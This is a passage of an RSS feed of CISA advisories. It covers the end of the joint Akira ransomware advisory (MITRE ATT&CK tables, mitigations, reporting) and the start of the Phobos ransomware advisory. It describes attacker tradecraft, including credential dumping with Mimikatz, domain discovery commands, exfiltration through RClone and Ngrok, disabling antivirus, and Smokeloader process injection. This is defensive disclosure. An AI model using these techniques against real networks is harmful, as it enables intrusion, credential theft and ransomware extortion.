432. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
433. <caption><em>Table 7: Credential Access</em></caption>
434. <thead>
435. <tr>
436. <th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
437. <th role="columnheader"><strong>ID</strong></th>
438. <th role="columnheader"><strong>Use</strong></th>
439. </tr>
440. </thead>
441. <tbody>
442. <tr>
443. <td>OS Credential Dumping</td>
444. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1003/" title="OS Credential Dumping">T1003</a></td>
445. <td>Akira threat actors use tools like Mimikatz and LaZagne to dump credentials.</td>
446. </tr>
447. <tr>
448. <td>
449. <p>OS Credential Dumping:</p>
450. <p>LSASS Memory</p>
451. </td>
452. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1003/001/" title="OS Credential Dumping: LSASS Memory">T1003.001</a></td>
453. <td>Akira threat actors attempt to access credential material stored in the process memory of the LSASS.</td>
454. </tr>
455. </tbody>
456. </table>
457. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
458. <caption><em>Table 8: Discovery</em></caption>
459. <thead>
460. <tr>
461. <th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
462. <th role="columnheader"><strong>ID</strong></th>
463. <th role="columnheader"><strong>Use</strong></th>
464. </tr>
465. </thead>
466. <tbody>
467. <tr>
468. <td>System Network Configuration Discovery </td>
469. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1016/" title="System Network Configuration Discovery">T1016</a></td>
470. <td>Akira threat actors use tools to scan systems and identify services running on remote hosts and local network infrastructure.</td>
471. </tr>
472. <tr>
473. <td>System Information Discovery</td>
474. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1082/" title="System Information Discovery">T1082</a></td>
475. <td>Akira threat actors use tools like PCHunter64 to acquire detailed process and system information.</td>
476. </tr>
477. <tr>
478. <td>Domain Trust Discovery</td>
479. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1482" title="Domain Trust Discovery">T1482</a></td>
480. <td>Akira threat actors use the net Windows command to enumerate domain information.</td>
481. </tr>
482. <tr>
483. <td>Process Discovery</td>
484. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1057/" title="Process Discovery">T1057</a></td>
485. <td>Akira threat actors use the <code>Tasklist</code> utility to obtain details on running processes via PowerShell.</td>
486. </tr>
487. <tr>
488. <td>Permission Groups Discovery: Local Groups</td>
489. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1069/001/" title="Permission Groups Discovery: Local Groups">T1069.001</a></td>
490. <td>Akira threat actors use the <code>net localgroup /dom</code> to find local system groups and permission settings.</td>
491. </tr>
492. <tr>
493. <td>Permission Groups Discovery: Domain Groups </td>
494. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1069/002/" title="Permission Groups Discovery: Domain Groups">T1069.002</a></td>
495. <td>Akira threat actors use the <code>net group /domain</code> command to attempt to find domain level groups and permission settings.</td>
496. </tr>
497. <tr>
498. <td>Remote System Discovery</td>
499. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1018/" title="Remote System Discovery">T1018</a></td>
500. <td>Akira threat actors use <code>nltest / dclist</code> to amass a listing of other systems by IP address, hostname, or other logical identifiers on a network.</td>
501. </tr>
502. </tbody>
503. </table>
504. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
505. <caption><em>Table 9: Persistence</em></caption>
506. <thead>
507. <tr>
508. <th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
509. <th role="columnheader"><strong>ID</strong></th>
510. <th role="columnheader"><strong>Use</strong></th>
511. </tr>
512. </thead>
513. <tbody>
514. <tr>
515. <td>Create Account: Domain Account</td>
516. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1136/002/" title="Create Account: Domain Account">T1136.002</a></td>
517. <td>Akira threat actors attempt to abuse the functions of domain controllers by creating new domain accounts to establish persistence.</td>
518. </tr>
519. </tbody>
520. </table>
521. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
522. <caption><em>Table 10: Defense Evasion</em></caption>
523. <thead>
524. <tr>
525. <th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
526. <th role="columnheader"><strong>ID</strong></th>
527. <th role="columnheader"><strong>Use</strong></th>
528. </tr>
529. </thead>
530. <tbody>
531. <tr>
532. <td>Impair Defenses: Disable or Modify Tools</td>
533. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1562/001" title="Impair Defenses: Disable or Modify Tools">T1562.001</a></td>
534. <td>Akira threat actors use BYOVD attacks to disable antivirus software.</td>
535. </tr>
536. </tbody>
537. </table>
538. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
539. <caption><em>Table 11: Command and Control</em></caption>
540. <thead>
541. <tr>
542. <th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
543. <th role="columnheader"><strong>ID</strong></th>
544. <th role="columnheader"><strong>Use</strong></th>
545. </tr>
546. </thead>
547. <tbody>
548. <tr>
549. <td>Remote Access Software</td>
550. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1219" title="Remote Access Software">T1219</a></td>
551. <td>Akira threat actors use legitimate desktop support software like AnyDesk to obtain remote access to victim systems.</td>
552. </tr>
553. <tr>
554. <td>Proxy</td>
555. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1090/" title="Proxy">T1090</a></td>
556. <td>Akira threat actors utilized Ngrok to create a secure tunnel to servers that aided in exfiltration of data. </td>
557. </tr>
558. </tbody>
559. </table>
560. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
561. <caption><em>Table 12: Collection</em></caption>
562. <thead>
563. <tr>
564. <th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
565. <th role="columnheader"><strong>ID</strong></th>
566. <th role="columnheader"><strong>Use</strong></th>
567. </tr>
568. </thead>
569. <tbody>
570. <tr>
571. <td>Archive Collected Data: Archive via Utility</td>
572. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1560/001/" title="Archive Collected Data: Archive via Utility">T1560.001</a></td>
573. <td>Akira threat actors use tools like WinRAR to compress files.</td>
574. </tr>
575. </tbody>
576. </table>
577. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
578. <caption><em>Table 13: Exfiltration</em></caption>
579. <thead>
580. <tr>
581. <th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
582. <th role="columnheader"><strong>ID</strong></th>
583. <th role="columnheader"><strong>Use</strong></th>
584. </tr>
585. </thead>
586. <tbody>
587. <tr>
588. <td>Exfiltration Over Alternative Protocol</td>
589. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1048/" title="Exfiltration Over Alternative Protocol">T1048</a></td>
590. <td>Akira threat actors use file transfer tools like WinSCP to transfer data.</td>
591. </tr>
592. <tr>
593. <td>Transfer Data to Cloud Account</td>
594. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1537" title="Transfer Data to Cloud Account">T1537</a></td>
595. <td>Akira threat actors use tools like CloudZilla to exfiltrate data to a cloud account and connect to exfil servers they control.</td>
596. </tr>
597. <tr>
598. <td>Exfiltration Over Web Service: Exfiltration to Cloud Storage</td>
599. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1567/002/" title="Exfiltration Over Web Service: Exfiltration to Cloud Storage">T1567.002</a></td>
600. <td>Akira threat actors leveraged RClone to sync files with cloud storage services to exfiltrate data. </td>
601. </tr>
602. </tbody>
603. </table>
604. <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
605. <caption><em>Table 14: Impact</em></caption>
606. <thead>
607. <tr>
608. <th role="columnheader" data-tablesaw-priority="persist"><strong>Technique Title</strong></th>
609. <th role="columnheader"><strong>ID</strong></th>
610. <th role="columnheader"><strong>Use</strong></th>
611. </tr>
612. </thead>
613. <tbody>
614. <tr>
615. <td>Date Encrypted for Impact</td>
616. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1486/" title="Data Encrypted for Impact">T1486</a></td>
617. <td>Akira threat actors encrypt data on target systems to interrupt availability to system and network resources.</td>
618. </tr>
619. <tr>
620. <td>Inhibit System Recovery</td>
621. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1490" title="Inhibit System Recovery">T1490</a></td>
622. <td>Akira threat actors delete volume shadow copies on Windows systems.</td>
623. </tr>
624. <tr>
625. <td>Financial Theft</td>
626. <td><a href="https://attack.mitre.org/versions/v14/techniques/T1657/" title="Financial Theft">T1657</a></td>
627. <td>Akira threat actors use a double-extortion model for financial gain.</td>
628. </tr>
629. </tbody>
630. </table>
631. <h3><strong>MITIGATIONS</strong></h3>
632. <h4><strong>Network Defenders</strong></h4>
633. <p>The FBI, CISA, EC3, and NCSC-NL recommend organizations apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the risk of compromise by Akira ransomware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA’s <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals" title="Cross-Sector Cybersecurity Performance Goals">Cross-Sector Cybersecurity Performance Goals</a> for more information on the CPGs, including additional recommended baseline protections.</p>
634. <ul>
635. <li><strong>Implement a recovery plan</strong> to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud) [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#NetworkSegmentation2F" title="Network Segmentation (2.F)">CPG 2.F</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SystemBackups2R" title="System Backups (2.R)">2.R</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#IncidentResponseIRPlans2S" title="Incident Response (IR) Plans (2.S)">2.S</a>].</li>
636. <li><strong>Require all accounts</strong> with password logins (e.g., service accounts, admin accounts, and domain admin accounts) <strong>to comply</strong> with NIST’s <a href="https://pages.nist.gov/800-63-3/" target="_blank" title="https://pages.nist.gov/800-63-3/">standards</a>. In particular, require employees to use long passwords and consider not requiring recurring password changes, as these can weaken security [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#UniqueCredentials2C" title="Unique Credentials (2.C)">CPG 2.C</a>].</li>
637. <li><strong>Require multifactor authentication</strong> for all services to the extent possible, particularly for webmail, virtual private networks, and accounts that access critical systems [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#PhishingResistantMultifactorAuthenticationMFA2H" title="Phishing-Resistant Multifactor Authentication (MFA) (2.H)">CPG 2.H</a>].</li>
638. <li><strong>Keep all operating systems, software, and firmware up to date.</strong> Timely patching is one of the most efficient and cost effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching <a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">known exploited vulnerabilities</a> in internet-facing systems. [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#MitigatingKnownVulnerabilities1E" title="Mitigating Known Vulnerabilities (1.E)">CPG 1.E</a>].</li>
639. <li><strong>Segment networks</strong> to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#NetworkSegmentation2F" title="Network Segmentation (2.F)">CPG 2.F</a>].</li>
640. <li><strong>Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool.</strong> To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#DetectingRelevantThreatsandTTPs3A" title="Detecting Relevant Threats and TTPs (3.A)">CPG 3.A</a>].</li>
641. <li><strong>Filter network traffic</strong> by preventing unknown or untrusted origins from accessing remote services on internal systems. This prevents threat actors from directly connecting to remote access services that they have established for persistence.</li>
642. <li><strong>Install, regularly update, and enable real time detection for antivirus software</strong> on all hosts.</li>
643. <li><strong>Review domain controllers, servers, workstations, and active directories</strong> for new and/or unrecognized accounts [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#AssetInventory1A" title="Asset Inventory (1.A)">CPG 1.A</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#DocumentDeviceConfigurations2O" title="Document Device Configurations (2.O)">2.O</a>].</li>
644. <li><strong>Audit user accounts</strong> with administrative privileges and configure access controls according to the principle of least privilege [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SeparatingUserandPrivilegedAccounts2E" title="Separating User and Privileged Accounts (2.E)">CPG 2.E</a>].</li>
645. <li><strong>Disable unused</strong> <strong>ports</strong> [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#ProhibitConnectionofUnauthorizedDevices2V" title="Prohibit Connection of Unauthorized Devices (2.V)">CPG 2.V</a>].</li>
646. <li><strong>Consider adding an email banner to emails</strong> received from outside of your organization [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#EmailSecurity2M" title="Email Security (2.M)">CPG 2.M</a>].</li>
647. <li><strong>Disable hyperlinks</strong> in received emails.</li>
648. <li><strong>Implement time-based access for accounts set at the admin level and higher.</strong> For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the <a href="https://www.cisa.gov/zero-trust-maturity-model" title="Zero Trust Maturity Model">Zero Trust model</a>). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.</li>
649. <li><strong>Disable command-line and scripting activities and permissions.</strong> Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SeparatingUserandPrivilegedAccounts2E" title="Separating User and Privileged Accounts (2.E)">CPG 2.E</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#DisableMacrosbyDefault2N" title="Disable Macros by Default (2.N)">2.N</a>].</li>
650. <li><strong>Maintain offline backups of data,</strong> and regularly maintain backup and restoration [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SystemBackups2R" title="System Backups (2.R)">CPG 2.R</a>]. By instituting this practice, the organization helps ensure they will not be severely interrupted, and/or only have irretrievable data. </li>
651. <li><strong>Ensure all backup data is encrypted, immutable</strong> (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure [<a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#StrongandAgileEncryption2K" title="Strong and Agile Encryption (2.K)">CPG 2.K</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SecureSensitiveData2L" title="Secure Sensitive Data (2.L)">2.L</a>, <a href="https://www.cisa.gov/cross-sector-cybersecurity-performance-goals#SystemBackups2R" title="System Backups (2.R)">2.R</a>].</li>
652. </ul>
653. <h3><strong>VALIDATE SECURITY CONTROLS</strong></h3>
654. <p>In addition to applying mitigations, the FBI, CISA, EC3, and NCSC-NL recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The FBI, CISA, EC3 and NCSC-NL recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.</p>
655. <p>To get started:</p>
656. <ol>
657. <li>Select an ATT&CK technique described in this advisory (see Tables 6 -14).</li>
658. <li>Align your security technologies against the technique.</li>
659. <li>Test your technologies against the technique.</li>
660. <li>Analyze your detection and prevention technologies’ performance.</li>
661. <li>Repeat the process for all security technologies to obtain a set of comprehensive performance data.</li>
662. <li>Tune your security program, including people, processes, and technologies, based on the data generated by this process.</li>
663. </ol>
664. <p>The FBI, CISA, EC3, and NCSC-NL recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.</p>
665. <h3><strong>RESOURCES</strong></h3>
666. <ul>
667. <li><a href="https://www.stopransomware.gov/" title="#StopRansomware">Stopransomware.gov</a> is a whole-of-government approach that gives one central location for ransomware resources and alerts.</li>
668. <li>Resource to mitigate a ransomware attack: <a href="https://www.cisa.gov/resources-tools/resources/stopransomware-guide" title="Joint Ransomware Task Force (JRTF) #StopRansomware Guide">#StopRansomware Guide</a>.</li>
669. <li>No cost cyber hygiene services: <a href="https://www.cisa.gov/cyber-hygiene-services" title="Cyber Hygiene Services">Cyber Hygiene Services</a>, <a href="https://github.com/cisagov/cset/releases/tag/v10.3.0.0" title="Ransomware Readiness Assessment CSET v10.3">Ransomware Readiness Assessment</a>.</li>
670. </ul>
671. <h3><strong>REFERENCES</strong></h3>
672. <ol>
673. <li><a href="https://www.fortinet.com/blog/threat-research/ransomware-roundup-akira" title="Ransomware Roundup - Akira">Fortinet: Ransomware Roundup - Akira</a></li>
674. <li><a href="https://blogs.cisco.com/security/akira-ransomware-targeting-vpns-without-multi-factor-authentication" title="Akira Ransomware Targeting VPNs without Multi-Factor Authentication">Cisco: Akira Ransomware Targeting VPNs without MFA</a></li>
675. <li><a href="https://www.truesec.com/hub/blog/akira-ransomware-and-exploitation-of-cisco-anyconnect-vulnerability-cve-2020-3259" title="Akira Ransomware and Exploitation of Cisco Anyconnect Vulnerability CVE-2020-3259">Truesec: Indications of Akira Ransomware Group Actively Exploiting Cisco AnyConnect CVE-2020-3259</a></li>
676. <li><a href="https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-akira" title="Ransomware Spotlight: Akira">TrendMicro: Akira Ransomware Spotlight</a></li>
677. <li><a href="https://www.crowdstrike.com/cybersecurity-101/kerberoasting/" title="KERBEROASTING ATTACKS">CrowdStrike: What is a Kerberoasting Attack?</a></li>
678. <li><a href="https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/" title="Akira, again: The ransomware that keeps on taking">Sophos: Akira, again: The ransomware that keeps on taking</a></li>
679. <li><a href="https://news.sophos.com/en-us/2023/05/09/akira-ransomware-is-bringin-88-back/" title="Akira Ransomware is “bringin’ 1988 back”">Sophos: Akira Ransomware is “bringin’ 1988 back”</a></li>
680. </ol>
681. <h3><strong>REPORTING</strong></h3>
682. <p>Your organization has no obligation to respond or provide information back to the FBI in response to this joint CSA. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.</p>
683. <p>The FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Akira threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.</p>
684. <p>Additional details of interest include: a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.</p>
685. <p>The FBI, CISA, EC3, and NCSC-NL do not encourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s <a href="https://www.ic3.gov/" title="Internet Crime Complain Center (IC3)">Internet Crime Complain Center (IC3)</a>, a local <u>FBI </u><a href="https://www.fbi.gov/contact-us/field-offices" title="Field Offices">Field Office</a>, or CISA via the agency’s <a href="https://www.cisa.gov/forms/report" title="Incident Reporting System">Incident Reporting System</a> or its 24/7 Operations Center (<a href="mailto:report@cisa.gov" title="Report to CISA">report@cisa.gov</a> or by calling 1-844-Say-CISA (1-844-729-2472).</p>
686. <h3><strong>DISCLAIMER</strong></h3>
687. <p>The information in this report is being provided “as is” for informational purposes only. The FBI, CISA, EC3, and NCSC-NL do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI or CISA.</p>
688. <h3><strong>ACKNOWLEDGEMENTS</strong></h3>
689. <p>Cisco, Sophos, and Fortinet contributed to this advisory.</p>
690. <h3><strong>VERSION HISTORY</strong></h3>
691. <p>April 18, 2024: Initial version.</p>
692. </description>
693.  <pubDate>Wed, 17 Apr 2024 12:23:11 EDT</pubDate>
694.    <dc:creator>CISA</dc:creator>
695.    <guid isPermaLink="false">/node/21319</guid>
696.    </item>
697. <item>
698.  <title>#StopRansomware: Phobos Ransomware</title>
699.  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a</link>
700.  <description>&lt;h3&gt;&lt;strong&gt;SUMMARY&lt;/strong&gt;&lt;/h3&gt;
701. <p><em><strong>Note:</strong> This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit </em><a href="https://www.cisa.gov/stopransomware" title="#StopRansomware"><em>stopransomware.gov</em></a><em> to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.</em></p>
702. <p>The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint CSA, to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024, according to open source reporting. Phobos is structured as a ransomware-as-a-service (RaaS) model. Since May 2019, Phobos ransomware incidents impacting state, local, tribal, and territorial (SLTT) governments have been regularly reported to the MS-ISAC. These incidents targeted municipal and county governments, emergency services, education, public healthcare, and other critical infrastructure entities to successfully ransom several million U.S. dollars.[<a href="https://www.privacyaffairs.com/moral-8-base-ransomware-targets-2-new-victims/" title="“Moral” 8Base Ransomware Targets 2 New Victims">1</a>],[<a href="https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html" title="8Base Ransomware: A Heavy Hitting Player">2</a>]</p>
703. <p>The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of Phobos ransomware and other ransomware incidents.</p>
704. <p>Download the PDF version of this report:</p>
705.  
706.  
707.  
708.  
709.  
710. <div class="c-file">
711.    <div class="c-file__download">
712.    <a href="https://www.cisa.gov/sites/default/files/2024-02/aa24-060a-stopransomware-phobos-ransomware_1.pdf" class="c-file__link" target="_blank">AA24-060A #StopRansomware: Phobos Ransomware</a>
713.    <span class="c-file__size">(PDF,       678.84 KB
714.  )</span>
715.  </div>
716. </div>
717. <p>For a downloadable copy of indicators of compromise (IOCs), see:</p>
718.  
719.  
720.  
721.  
722.  
723. <div class="c-file">
724.    <div class="c-file__download">
725.    <a href="https://www.cisa.gov/sites/default/files/2024-02/AA24-060A.stix_.xml" class="c-file__link" target="_blank">AA24-060A STIX XML</a>
726.    <span class="c-file__size">(XML,       147.73 KB
727.  )</span>
728.  </div>
729. </div>
730.  
731.  
732.  
733.  
734.  
735. <div class="c-file">
736.    <div class="c-file__download">
737.    <a href="https://www.cisa.gov/sites/default/files/2024-02/AA24-060A-StopRansomware-Phobos-Ransomware.stix_.json" class="c-file__link" target="_blank">AA24-060A STIX JSON</a>
738.    <span class="c-file__size">(JSON,       119.53 KB
739.  )</span>
740.  </div>
741. </div>
742. <h3><strong>TECHNICAL DETAILS</strong></h3>
743. <p><strong>Note:</strong> This advisory uses the <a href="https://attack.mitre.org/versions/v14/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&CK for Enterprise</a> framework, version 14. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s <a href="https://www.cisa.gov/news-events/news/best-practices-mitre-attckr-mapping" title="Best Practices for MITRE ATT&CK Mapping">Best Practices for MITRE ATT&CK Mapping</a> and CISA’s <a href="https://github.com/cisagov/Decider/" title="cisagov / decider">Decider Tool</a>.</p>
744. <h4><strong>Overview</strong></h4>
745. <p>According to open source reporting, Phobos ransomware is likely connected to numerous variants (including Elking, Eight, Devos, Backmydata, and Faust ransomware) due to similar TTPs observed in Phobos intrusions. Phobos ransomware operates in conjunction with various open source tools such as Smokeloader, Cobalt Strike, and Bloodhound. These tools are all widely accessible and easy to use in various operating environments, making it (and associated variants) a popular choice for many threat actors.[<a href="https://www.infosecurity-magazine.com/news/phobos-ransomware-new-faust-variant/" title="Phobos Ransomware Family Expands With New FAUST Variant">3</a>],[<a href="https://therecord.media/romanian-hospitals-offline-after-ransomware-attack" title="Hospitals offline across Romania following ransomware attack on IT platform">4</a>]</p>
746. <h4><strong>Reconnaissance and Initial Access</strong></h4>
747. <p>Phobos actors typically gain initial access to vulnerable networks by leveraging phishing campaigns [<a href="https://attack.mitre.org/versions/v14/techniques/T1598/" title="Phishing for Information">T1598</a>] to drop hidden payloads or using internet protocol (IP) scanning tools, such as Angry IP Scanner, to search for vulnerable Remote Desktop Protocol (RDP) ports [<a href="https://attack.mitre.org/versions/v14/techniques/T1595/001/" title="Active Scanning: Scanning IP Blocks">T1595.001</a>] or by leveraging RDP on Microsoft Windows environments.[<a href="https://www.comparitech.com/net-admin/phobos-ransomware/" title="What is Phobos Ransomware & How to Protect Against It?">5</a>],[<a href="https://blog.talosintelligence.com/understanding-the-phobos-affiliate-structure/" title="Understanding the Phobos affiliate structure and activity">6</a>]</p>
748. <p>Once they discover an exposed RDP service, the actors use open source brute force tools to gain access [<a href="https://attack.mitre.org/versions/v14/techniques/T1110/" title="Brute Force">T1110</a>]. If Phobos actors gain successful RDP authentication [<a href="https://attack.mitre.org/versions/v14/techniques/T1133/" title="External Remote Services">T1133</a>][<a href="https://attack.mitre.org/versions/v14/techniques/T1078/" title="Valid Accounts">T1078</a>] in the targeted environment, they perform open source research to create a victim profile and connect the targeted IP addresses to their associated companies [<a href="https://attack.mitre.org/versions/v14/techniques/T1593/" title="Search Open Websites/Domains">T1593</a>]. Threat actors leveraging Phobos have notably deployed remote access tools to establish a remote connection within the compromised network [<a href="https://attack.mitre.org/versions/v14/techniques/T1219/" title="Remote Access Software">T1219</a>].[<a href="https://blog.talosintelligence.com/deep-dive-into-phobos-ransomware/" title="A deep dive into Phobos ransomware, recently deployed by 8Base group">7</a>]</p>
749. <p>Alternatively, threat actors send spoofed email attachments [<a href="https://attack.mitre.org/versions/v14/techniques/T1566/001/" title="Phishing: Spearphishing Attachment">T1566.001</a>] that are embedded with hidden payloads [<a href="https://attack.mitre.org/versions/v14/techniques/T1204/002/" title="User Execution: Malicious File">T1204.002</a>] such as SmokeLoader, a backdoor trojan that is often used in conjunction with Phobos. After SmokeLoader’s hidden payload is downloaded onto the victim’s system, threat actors use the malware’s functionality to download the Phobos payload and exfiltrate data from the compromised system.</p>
750. <h4><strong>Execution and Privilege Escalation</strong></h4>
751. <p>Phobos actors run executables like <code>1saas.exe</code> or <code>cmd.exe</code> to deploy additional Phobos payloads that have elevated privileges enabled [<a href="https://attack.mitre.org/versions/v14/tactics/TA0004/" title="Privilege Escalation">TA0004</a>]. Additionally, Phobos actors can use the previous commands to perform various windows shell functions. The Windows command shell enables threat actors to control various aspects of a system, with multiple permission levels required for different subsets of commands [<a href="https://attack.mitre.org/versions/v14/techniques/T1059/003/" title="Command and Scripting Interpreter: Windows Command Shell">T1059.003</a>][<a href="https://attack.mitre.org/versions/v14/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>].[<a href="https://www.malwarebytes.com/blog/news/2019/07/a-deep-dive-into-phobos-ransomware" title="A deep dive into Phobos ransomware">8</a>]</p>
752. <h5><em><strong>Smokeloader Deployment</strong></em></h5>
753. <p>Phobos operations feature a standard three phase process to decrypt a payload that allows the threat actors to deploy additional destructive malware.[<a href="https://any.run/malware-trends/smoke" title="Smoke Loader">9</a>]</p>
754. <p>For the first phase, Smokeloader manipulates either <code>VirtualAlloc</code> or <code>VirtualProtect API</code> functions—which opens an entry point, enabling code to be injected into running processes and allowing the malware to evade network defense tools [<a href="https://attack.mitre.org/versions/v14/techniques/T1055/002/" title="Process Injection: Portable Executable Injection">T1055.002</a>]. In the second phase, a stealth process is used to obfuscate command and control (C2) activity by producing requests to legitimate websites [<a href="https://attack.mitre.org/versions/v14/techniques/T1001/003/" title="Data Obfuscation: Protocol Impersonation">T1001.003</a>].[<a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader" title="SmokeLoader">10</a>]</p>
755. <p>Within this phase, the shellcode also sends a call from the entry point to a memory container [<a href="https://attack.mitre.org/versions/v14/techniques/T1055/004/" title="Process Injection: Asynchronous Procedure Call">T1055.004</a>] and prepares a portable executable for deployment in the final stage [<a href="https://attack.mitre.org/versions/v14/techniques/T1027/002/" title="Obfuscated Files or Information: Software Packing">T1027.002</a>][<a href="https://attack.mitre.org/versions/v14/techniques/T1105/" title="Ingress Tool Transfer">T1105</a>][<a href="https://attack.mitre.org/versions/v14/techniques/T1140/" title="Deobfuscate/Decode Files or Information">T1140</a>].</p>
